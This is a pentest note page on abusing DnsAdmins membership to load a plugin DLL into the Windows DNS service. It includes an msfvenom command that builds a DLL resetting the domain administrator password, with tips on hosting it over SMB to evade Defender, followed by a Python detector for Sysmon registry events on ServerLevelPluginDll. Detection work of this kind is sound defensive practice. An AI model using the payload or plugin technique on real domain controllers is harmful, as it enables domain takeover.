Pentest - Active Directory - DNS
DNS
DNSAdmins
Being a member of the DnsAdmins group allows us to use dnscmd.exe to specify a plugin DLL that the DNS service will load. Let’s create a DLL using msfvenom that changes the administrator password.
c:\Users\kdbed\kdbed.github.io\org>msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
Transferring this to the box would likely trigger Windows Defender, so we can use Impacket’s smbserver.py to start an SMB server and host the DLL remotely.
Then set the remote DLL path in the Windows registry.
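On the defensive side, the registry change described above is the detection point. The following is an added example, not code from the original page: it scans Sysmon registry events (EventID 13) for writes to the DNS service's ServerLevelPluginDll value and rates the configured path, with a UNC path rated highest. The sample events, host name and paths are constructed, and it assumes Sysmon is configured to log this key.

```python
import re

# Tail of the registry value the DNS service reads its plugin DLL path from.
PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"
SYSTEM32_DLL = re.compile(r"^[a-z]:\\windows\\system32\\[^\\]+\.dll$", re.I)

def classify_plugin_path(path):
    """Rate a configured plugin DLL path; remote loads are the worst case."""
    p = path.strip().strip('"')
    if not p:
        return "cleared"
    if p.startswith("\\\\"):            # UNC path: DLL is fetched over SMB
        return "critical"
    if not SYSTEM32_DLL.match(p):       # local file, but outside System32
        return "high"
    return "review"                     # any plugin DLL still needs an owner

def detect_plugin_changes(events):
    """Return one finding per Sysmon EventID 13 write to the plugin value."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        # Match on the tail so CurrentControlSet and ControlSet001 both hit.
        if not ev.get("TargetObject", "").lower().endswith(PLUGIN_VALUE):
            continue
        details = ev.get("Details", "")
        findings.append({"host": ev.get("Computer"), "time": ev.get("UtcTime"),
                         "path": details, "severity": classify_plugin_path(details)})
    return findings

# Constructed sample events; field names follow Sysmon's registry event schema.
KEY = r"HKLM\System\CurrentControlSet\Services\DNS\Parameters"

def make_event(time, value, details):
    return {"EventID": 13, "Computer": "dc01.example.test", "UtcTime": time,
            "TargetObject": KEY + "\\" + value, "Details": details}

SAMPLE_EVENTS = [
    make_event("2025-01-01 10:00:00.000", "ServerLevelPluginDll", r"\\192.0.2.10\share\plugin.dll"),
    make_event("2025-01-01 10:01:00.000", "LogLevel", "DWORD (0x00000001)"),
    make_event("2025-01-01 10:02:00.000", "ServerLevelPluginDll", r"C:\Users\Public\plugin.dll"),
    make_event("2025-01-01 10:03:00.000", "ServerLevelPluginDll", r"C:\Windows\System32\vendor.dll"),
]

if __name__ == "__main__":
    for finding in detect_plugin_changes(SAMPLE_EVENTS):
        print(finding)
```

Because most DNS servers never set this value, any hit is worth triage. Pair the alert with a review of who holds DnsAdmins membership.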